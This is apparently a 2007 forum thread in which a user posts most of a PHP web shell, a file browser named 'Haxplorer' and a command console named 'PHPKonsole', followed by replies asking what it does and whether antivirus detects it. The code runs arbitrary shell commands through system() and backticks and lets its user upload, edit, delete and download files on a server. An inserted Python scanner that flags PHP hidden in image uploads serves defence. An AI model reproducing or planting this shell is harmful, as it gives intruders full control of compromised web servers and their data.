  375.        echo "<strong>R</strong>";
  376.    }
  377.    if (function_exists('is_writeable')) {
  378.    if ( @is_writeable("$dir/$file" ) ) {
  379.      echo "<strong>W</stong>";
  380.     }
  381.   }
  382.    else {
  383.         echo "<strong>(W)</stong>";
  384.      }
  385.      if ( @is_executable("$dir/$file" ) ) {
  386.     echo "<Strong>X<strong>";
  387.    }
  388.    echo "&nbsp;&nbsp;</td>\n";
  389.     /* <!-- Date --> */
  390.   echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
  391.    echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file" ))."&nbsp;&nbsp;";
  392.    echo "</td>";
  393.   echo "</tr>\n";
  394.          }
  395.     else { /* <!-- Then it must be a File... --> */
  396.          /* <!-- Filename --> */
  397.   if ( @is_readable("$dir/$file" ) )
  398.     echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file" ).sp(9)."</td>\n";
  399.      else
  400.       echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
  401.             /* <!-- Actions --> */
  402.   echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n";
  403.     /* <!-- Rename --> */
  404.   echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file" ).sp(3)."\n";
  405.       /* <!-- Edit --> */
  406.   if ( (@is_writeable("$dir/$file" )) && (@is_readable("$dir/$file" )) )
  407.     echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file" ).sp(3)."\n";
  408.        /* <!-- Copy --> */
  409.    echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file" )."\n";
  410.       /* <!-- Move --> */
  411.   if ( (@is_writeable("$dir/$file" )) && (@is_readable("$dir/$file" )) )
  412.      echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file" )."\n";
  413.         /* <!-- Delete --> */
  414.   echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir" )."\n";
  415.     /* <!-- Download --> */
  416.   echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file" )."\n";
  417.     /* <!-- Execute --> */
  418.   if ( @is_executable("$dir/$file" ) )
  419.     echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file" )."\n";
  420.         /* <!-- End of Actions --> */
  421.   echo sp(2)."</center></td>\n";
  422.     /* <!-- Size --> */
  423.   echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
  424.    $size = @filesize("$dir/$file" );
  425.    If ($size != false) {
  426.           $filesizes += $size;
  427.    echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>";
  428.   }
  429.   else
  430.    echo "&nbsp;&nbsp;<strong>0 B<strong>";
  431.    echo "&nbsp;&nbsp;</td>\n";
  432.     /* <!-- Attributes --> */
  433.   echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
  434.    if ( @is_readable("$dir/$file" ) )
  435.     echo "<strong>R</strong>";
  436.       if ( @is_writeable("$dir/$file" ) )
  437.     echo "<strong>W</stong>";
  438.       if ( @is_executable("$dir/$file" ) )
  439.     echo "<Strong>X<strong>";
  440.       if (function_exists('is_uploaded_file')){
  441.     if ( @is_uploaded_file("$dir/$file" ) )
  442.      echo "<Strong>U<strong>";
  443.    }
  444.    else {
  445.    echo "<Strong>(U)<strong>";
  446.   }
  447.    echo "&nbsp;&nbsp;</td>\n";
  448.     /* <!-- Date --> */
  449.   echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
  450.    echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file" ))."&nbsp;&nbsp;";
  451.    echo "</td>";
  452.    echo "</tr>\n";
  453.   }
  454.    }
  455.      echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
  456.    echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Dir(s),&nbsp;".@count ($filen)."&nbsp;File(s)&nbsp;&nbsp;\n";
  457.    echo "</td><td NOWRAP class=\"silver border noleft\">\n";
  458.    echo "&nbsp;&nbsp;Total filesize:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
  459. function printpagelink($a, $b, $link = "" ){
  460.  if ($link != "" )
  461.   echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
  462.  else
  463.   echo "<b>| $a - $b |</b>";
  464. }
  465.        
  466. if ( count($filelist)-1 > $Pmax ) {
  467.  echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
  468.  $Fi = 0;
  469.  while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
  470.   $from = $Fi*$Pmax;
  471.   while (($filelist[$from]=="." ) || ($filelist[$from]==".." )) $from++;
  472.   $to = ($Fi + 1) * $Pmax - 1;
  473.   if ($Fi == $Pidx)
  474.    $link="";
  475.   else
  476.    $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
  477.   printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
  478.   echo "&nbsp;&nbsp;&nbsp;";
  479.   $Fi++;
  480.  }
  481.  $from = $Fi*$Pmax;
  482.  while (($filelist[$from]=="." ) || ($filelist[$from]==".." )) $from++;
  483.  $to = count($filelist)-1;
  484.  if ($Fi == $Pidx)
  485.   $link="";
  486.  else
  487.   $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
  488.  printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
  489.  echo "</center></td></tr></table></td></tr>";
  490. }
  491.      echo "</table>\n<br><table NOWRAP>";
  492.    if ($isGoodver) {
  493.  echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n";
  494. }
  495.  else {
  496.  echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n";
  497. }
  498.         /* <!-- Other Actions --> */
  499.     echo "<tr><td class=\"silver border\">&nbsp;<strong>Other actions:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
  500.    echo "<td>&nbsp;<b>".buildUrl( "| New File |", "cmd=newfile&lastcmd=dir&lastdir=$dir" )."\n".sp(3).
  501.                      buildUrl( "| New Directory |", "cmd=newdir&lastcmd=dir&lastdir=$dir" )."\n".sp(3).
  502.        buildUrl( "| Upload a File |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir" ). "</b>\n</td></tr>\n";
  503.      echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
  504.    echo "<tr><td class=\"silver border\">&nbsp;<strong>Your IP:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
  505.    echo "<tr><td class=\"silver border\">&nbsp;<strong>Browsing Directory:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
  506.    echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Legend:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
  507.    echo "<table NOWRAP>";
  508.         echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Directory.</td></tr>\n";
  509.     echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Readable.</td></tr>\n";
  510.    echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Writeable.</td></tr>\n";
  511.    echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Executable.</td></tr>\n";
  512.    echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n";
  513.    echo "</table></td>";
  514.  echo "</table>";
  515.  echo "<br>";
  516.       @closedir($h);
  517.   }
  518.   elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
  519.  echo system("$file" );
  520. }
  521. elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
  522. echo "<center><table><tr><td NOWRAP>" ;
  523.  if ($auth == "yes" ) {
  524.  if (Mydeldir($file)==false) {
  525.    echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
  526.     }
  527.   else {
  528.    echo "Successfully removed \"$file\"<br>";
  529.   }
  530.   echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>";
  531. }
  532.  else {
  533.  echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
  534.         <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  535.         <input type=\"hidden\" name=\"cmd\" value=\"deldir\">
  536.       <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
  537.       <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
  538.       <input type=\"hidden\" name=\"file\" value=\"$file\">
  539.       <input type=\"hidden\" name=\"auth\" value=\"yes\">
  540.       <input type=\"submit\" value=\"Yes\"></form>
  541.         <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  542. <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
  543. <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
  544. <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
  545.         }
  546.  echo "</td></tr></center>";
  547. }
  548. elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */ echo "<center><table><tr><td NOWRAP>" ;
  549.  if ($auth == "yes" ) {
  550.  if (@unlink($file)==false) {
  551.    echo "Could not remove \"$file\"<br>";
  552.     }
  553.   else {
  554.    echo "Successfully removed \"$file\"<br>";
  555.   }
  556.  echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>";
  557.         }
  558.  else {
  559.         echo "Are you sure you want to delete \"$file\" ?
  560.        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  561.       <input type=\"hidden\" name=\"cmd\" value=\"delfile\">
  562.       <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
  563.       <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
  564.       <input type=\"hidden\" name=\"file\" value=\"$file\">
  565.       <input type=\"hidden\" name=\"auth\" value=\"yes\">
  566.       <input type=\"submit\" value=\"Yes\"></form>
  567.         <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  568. <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
  569. <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
  570. <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
  571.         }
  572.  echo "</td></tr></center>";
  573. }
  574. elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
  575. echo "<center><table><tr><td NOWRAP>";
  576.  $i = 1;
  577.  while (file_exists("$lastdir/newfile$i.txt" ))
  578.   $i++;
  579.  $file = fopen("$lastdir/newfile$i.txt", "w+" );
  580.  if ($file == false)
  581.   echo "Could not create the new file...<br>";
  582.  else
  583.   echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
  584.   echo "
  585.       <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  586.   <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
  587.   <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
  588.   <input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\">
  589.   </form></center>
  590.    </td></tr></table></center>     ";
  591. }
  592. elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
  593. echo "<center><table><tr><td NOWRAP>" ;
  594.  $i = 1;
  595.  while (is_dir("$lastdir/newdir$i" ))
  596.     $i++;
  597.  $file = mkdir("$lastdir/newdir$i", 0777);
  598.  if ($file == false)
  599.   echo "Could not create the new directory...<br>";
  600.  else
  601.   echo "Successfully created: \"$lastdir/newdir$i\"<br>";
  602.  echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
  603.  <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
  604.  <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
  605.  <input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\">
  606.  </form></center></td></tr></table></center>";
  607. }
  608. elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
  609. $contents = "";
  610. $fc = @file( $file );
  611.    while ( @list( $ln, $line ) = each( $fc ) ) {
  612.     $contents .= htmlentities( $line ) ;
  613.  }
  614.  echo "<br><center><table><tr><td NOWRAP>";
  615. echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
  616. echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
  617. echo "<strong>EDIT FILE: </strong>$file<br>\n";
  618. echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
  619. echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
  620. echo "<input type=\"submit\" value=\"Save\">";
  621. echo "</form>";
  622. echo "</td></tr></table></center>";
  623. }
  624. elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
  625. $fo = fopen($file, "w" );
  626. $wrret = fwrite($fo, stripslashes($contents));
  627. $clret = fclose($fo);
  628. }
  629. elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */
  630. $downloadfile = urldecode($file);
  631. if (function_exists("basename" ))
  632.       $downloadto = basename ($downloadfile);
  633. else
  634.  $downloadto = "download.ext";
  635. if (!file_exists("$downloadfile" ))
  636.  echo "The file does not exist";
  637. else {
  638.  $size = @filesize("$downloadfile" );
  639.  if ($size != false) {
  640.   $add="; size=$size";
  641.  }
  642.  else {
  643.   $add="";
  644.  }
  645.   header("Content-Type: application/download" );
  646.  header("Content-Disposition: attachment; filename=$downloadto$add" );
  647.  $fp=fopen("$downloadfile" ,"rb" );
  648.  fpassthru($fp);
  649.  flush();
  650. }
  651. }
  652. elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */
  653.     ?>
  654. <center>
  655.  <table>
  656.   <tr>
  657.    <td NOWRAP>
  658.       Welcome to the upload section...
  659.   Please note that the destination file will be
  660.  <br> overwritten if it already exists!!!<br><br>
  661.   <form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
  662.    <input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
  663.    <input type="hidden" name="cmd" value="uploadproc">
  664.    <input type="hidden" name="dir" value="<?php echo $dir ?>">
  665.    <input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
  666.    <input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
  667.    Select local file:<br>
  668.    <input size="75" name="userfile" type="file"><br>
  669.    <input type="submit" value="Send File">
  670.   </form>
  671.  <br>
  672.   <form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
  673.   <input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
  674.   <input type="hidden" name="dir" value="<?php echo $lastdir ?>">
  675.   <input tabindex="0" type="submit" value="Cancel">
  676.  </form>
  677.    </td>
  678.   </tr>
  679.  </table>
  680. </center>
  681.  <?php
  682. }
  683. elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
  684. echo "<center><table><tr><td NOWRAP>";
  685. if (file_exists($userfile))
  686.  $res = copy($userfile, "$dir/$userfile_name" );
  687. echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
  688.       if ($res) {
  689.  echo "Successfully moved \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
  690.  echo "Local filename: \"$userfile_name\".\n<br>Remote filename: \"$userfile\".\n<br>";
  691.  echo "Filesize: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
  692. }
  693. else {
  694.  echo "Could not move uploaded file; Action aborted...";
  695. }
  696. echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ;
  697. echo "<br><br></td></tr></table></center>";
  698. }
  699. elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
  700.         echo "<hr>";
  701. $fc = @file( $file );   while ( @list( $ln, $line ) = each( $fc ) ) {
  702.     echo spacetonbsp(@htmlentities($line))."<br>\n";
  703.    }
  704. echo "<hr>";
  705. }
  706. elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
  707.       if (function_exists('is_dir')) {
  708.   if (is_dir("$oldfile" )) {
  709.    $objname = "Directory";
  710.    $objident = "Directory";
  711.     }
  712.   else {
  713.    $objname = "Filename";
  714.    $objident = "file";
  715.   }
  716.  }
  717.     echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n";
  718. If (empty($newfile) != true) {
  719.   echo "<center>";
  720.   $return = @rename($oldfile, "$olddir$newfile" );
  721.  if ($return) {
  722.    echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
  723.   }
  724.   else {
  725.    if ( @file_exists("$olddir$newfile" ) ) {
  726.     echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
  727.    }
  728.    else {
  729.     echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
  730.    }
  731.     }
  732.   echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ;
  733.  }
  734.  else {
  735.   $dpos = strrpos($oldfile, "/" );
  736.   if (strval($dpos)!="" ) {
  737.    $olddir = substr($oldfile, 0, $dpos+1);
  738.      }
  739.   else {
  740.    $olddir = "$lastdir/";
  741.  }
  742.   $fpos = strrpos($oldfile, "/" );
  743.   if (strval($fpos)!="" ) {
  744.    $inputfile = substr($oldfile, $fpos+1);
  745.      }
  746.   else {
  747.    $inputfile = "";
  748.   }
  749.          echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
  750.   echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
  751.   echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
  752.   echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
  753.   echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
  754.   echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
  755.   echo "Rename \"$oldfile\" to:<br>\n";
  756.   echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">";
  757.  echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
  758.   echo "</td></tr></table></center>";
  759.  }
  760. }
  761. else if ( $cmd == "con" ) {
  762. ?>
  763. <center>
  764. <table>
  765. <tr><td>
  766. <h3>PHPKonsole</h3>
  767. <?php
  768. if (ini_get('register_globals') != '1') {
  769.     if (!empty($HTTP_POST_VARS))
  770. extract($HTTP_POST_VARS);
  771.  
  772.     if (!empty($HTTP_GET_VARS))
  773. extract($HTTP_GET_VARS);
  774.      
  775.     if (!empty($HTTP_SERVER_VARS))
  776. extract($HTTP_SERVER_VARS);
  777.     }
  778.     
  779.     if (!empty($work_dir)) {
  780. if (!empty($command)) {
  781.     if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
  782.         if ($regs[1][0] == '/') {
  783.             $new_dir = $regs[1];
  784.  } else {
  785.      $new_dir = $work_dir . '/' . $regs[1];
  786.  }
  787.  if (file_exists($new_dir) && is_dir($new_dir)) {
  788.      $work_dir = $new_dir;
  789.  }
  790.  unset($command);
  791.     }
  792. }
  793.     }
  794.     if (file_exists($work_dir) && is_dir($work_dir)) {
  795. chdir($work_dir);
  796.     }
  797.     $work_dir = exec('pwd');
  798. ?>
  799.     <form name="myform" action="<?php echo "$PHP_SELF?$urlAdd" ?>" method="post">
  800. <table border=0 cellspacing=0 cellpadding=0 width="100%"><tr><td>Current working directory: <b>
  801. <input type="hidden" name="cmd" value="con">
  802. <?php
  803.     $work_dir_splitted = explode('/', substr($work_dir, 1));
  804.     printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=/">Root</a>/', $PHP_SELF, $stderr);
  805.     if (!empty($work_dir_splitted[0])) {
  806.  $path = '';
  807.  for ($i = 0; $i < count($work_dir_splitted); $i++) {
  808.      $path .= '/' . $work_dir_splitted[$i];
  809.      printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=%s">%s</a>/', $PHP_SELF, $stderr, urlencode($path), $work_dir_splitted[$i]);
  810.  }
  811.     }
  812. ?></b></td>
  813. <td align="right">Choose new working directory: <select class="inputtext" name="work_dir" onChange="this.form.submit()">
  814. <?php
  815. $dir_handle = opendir($work_dir);
  816. while ($dir = readdir($dir_handle)) {
  817.     if (is_dir($dir)) {
  818.  if ($dir == '.') {
  819.      echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
  820.  } elseif ($dir == '..') {
  821.      if (strlen($work_dir) == 1) {
  822.      }
  823.      elseif (strrpos($work_dir, '/') == 0) {
  824.   echo "<option value=\"/\">Parent Directory</option>\n";
  825.      } else {
  826.   echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/" ), 1)) ."\">Parent Directory</option>\n";
  827.      }
  828.  } else {
  829.      if ($work_dir == '/') {
  830.   echo "<option value=\"$work_dir$dir\">$dir</option>\n";
  831.      } else {
  832.   echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
  833.      }
  834.  }
  835.     }
  836. }
  837. closedir($dir_handle);
  838. ?>
  839. </select></td></tr></table>
  840. <p>Command: <input class="inputtext" type="text" name="command" size="60">
  841. <input name="submit_btn" class="inputbutton" type="submit" value="Execute Command"></p>
  842. <p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"<?php if (($stderr) || (!isset($stderr)) ) echo " CHECKED"; ?>></p>
  843. <textarea cols="80" rows="19" class="inputtextarea" wrap=off readonly><?php
  844.     if (!empty($command)) {
  845.         echo "phpKonsole> ". htmlspecialchars($command) . "\n\n";
  846.  if ($stderr) {
  847.      $tmpfile = tempnam('/tmp', 'phpshell');
  848.      $command .= " 1> $tmpfile 2>&1; " . "cat $tmpfile; rm $tmpfile";
  849.  } else if ($command == 'ls') {
  850.      $command .= ' -F';
  851.  }
  852.  $output = `$command`;
  853.  echo htmlspecialchars($output);
  854.     }
  855. ?></textarea>
  856.     </form>
  857.                                  
  858.     <script language="JavaScript" type="text/javascript">
  859. document.forms[0].command.focus();
  860.     </script>
  861. </td></tr></table>
  862. <?php
  863. }   
  864. else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
  865. $isMainMenu = true;
  866.      ?>
  867. <table width="100%" border="0" cellpadding="0" cellspacing="0">
  868.  <tr>
  869.   <td width="100%" class="border">
  870.    <center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center>
  871.   </td>
  872.  </tr>
  873. </table>
  874. <br>
  875.  <center>
  876. <table border="0" NOWRAP>
  877.   <tr>
  878.   <td valign="top" class="silver border">
  879.            <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> Haxplorer <==</strong></font>", "cmd=dir&dir=." ).sp(2); ?>
  880.   </td>
  881.    <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
  882.    Haxplorer is a server side file browser wich (ab)uses the directory object to list
  883.     the files and directories stored on a webserver. This handy tools allows you to manage
  884.     files and directories on a unsecure server with php support.<br><br>This entire script
  885.     is coded for unsecure servers, if your server is secured the script will hide commands
  886.     or will even return errors to your browser...<br><br>
  887.   </td>
  888.  </tr>
  889.   <tr>
  890.   <td valign="top" class="silver border">
  891.            <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> PHPKonsole <==</strong></font>", "cmd=con" ).sp(2); ?>
  892.   </td>
  893.    <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
  894.    <br>PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver.
  895.     When you run commands they will run as the webservers UserID. This should work perfectly
  896.     for managing files, like moving, copying etc. If you're using a linux server, system commands
  897.     such as ls, mv and cp will be available for you... <br><br>This function will only work if the
  898.     server supports php and the execute commands...<br><br>
  899.   </td>
  900.  </tr>
  901.         </table>
  902. </center>
  903. <br>
  904.      <?php
  905. }
  906. if ($cmd != "downl" ) {
  907. if ( $isMainMenu != true) {
  908.   ?>
  909.  <table width="100%" border="0" cellpadding="0" cellspacing="0">
  910.   <tr>
  911.    <td width="100%" style="class="silver border">
  912.     <center><strong>
  913.      &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;]  </font>", "cmd=&dir=" );      ?>&nbsp;&nbsp;
  914.      &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;PHPKonsole&nbsp;] </font>", "cmd=con" );        ?>&nbsp;&nbsp;
  915.                     &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Haxplorer&nbsp;]  </font>", "cmd=dir&dir=." );  ?> &nbsp;&nbsp;
  916.      </strong></center>
  917.    </td>
  918.   </tr>
  919.  </table>
  920.  <br>
  921.  <?php
  922. }
  923. ?>
  924. <table width=100% border="0" cellpadding="0" cellspacing="0">
  925.  <tr>
  926.   <td width="100%" class="silver border">
  927.    <center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
  928.   </td>
  929.  </tr>
  930. </table>
  931.     </td>
  932.   </tr>
  933. </table>
  934.   <?php
  935. }
  936. ?>
  937. </body>
  938. </html>
  939. </body>
  940. </html>


Message edited by le_phoenix on 16-11-2007 at 20:04:56
Reply
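For site owners cleaning up after an upload like this one, here is an added example (not part of the thread, and not code from the posted script) that flags files in an upload directory which carry an image extension but contain PHP. The function names and the magic-byte table are assumptions of this example; the marker strings are copied from the listing above.

```python
import os
import re

# Leading bytes of the image types a gallery normally accepts.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
PHP_TAG = re.compile(rb"<\?php", re.I)
# Strings that occur in the listing posted on this page.
PAGE_MARKERS = (b"PHPKonsole", b"Haxplorer", b"$output = `$command`")


def inspect_upload(name, data):
    """Return the list of reasons why an uploaded file looks like a script."""
    reasons = []
    ext = os.path.splitext(name.lower())[1]
    magics = IMAGE_MAGIC.get(ext)
    if magics and not data.startswith(magics):
        reasons.append("image extension without image header")
    if PHP_TAG.search(data):
        reasons.append("PHP open tag")
    hits = [m.decode() for m in PAGE_MARKERS if m in data]
    if hits:
        reasons.append("markers: " + ", ".join(hits))
    return reasons


def scan_tree(root):
    """Walk an upload directory and return {path: reasons} for suspect files."""
    findings = {}
    for folder, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(folder, fname)
            with open(path, "rb") as fh:
                reasons = inspect_upload(fname, fh.read())
            if reasons:
                findings[path] = reasons
    return findings


if __name__ == "__main__":
    # Constructed samples: a plain JPEG header, a script renamed to .jpg,
    # and a real JPEG header with PHP appended after it.
    samples = {
        "holiday.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,
        "renamed_script.jpg": b"<?php /* PHPKonsole */ $output = `$command`; ?>",
        "avatar.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 8 + b"<?php echo 1; ?>",
    }
    for name, data in samples.items():
        print(name, inspect_upload(name, data) or "clean")
```

The third sample shows why the header check alone is not enough: a file can start with valid image bytes and still carry PHP further in.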

Posted on 17-11-2007 at 19:12:18

The Magic Picture script is really handy.
This is the kind of script (no graphical frills and very complete) that I'm looking for; I never imagined I'd find it among hackers :-)
If you have others like it, don't hesitate to post them.

Reply

Posted on 01-12-2007 at 01:00:04

I didn't really understand this PHP code; what is this script for, in the end, please?


Message edited by wind128 on 01-12-2007 at 01:01:51
Reply

Posted on 01-12-2007 at 01:28:55

To do whatever you want on the web server without going through FTP

Reply

Posted on 01-12-2007 at 20:57:19

If I put this script on an HTML page, what does it look like?
Will the antivirus flag something, for example?

Reply

Posted on 02-12-2007 at 22:35:54

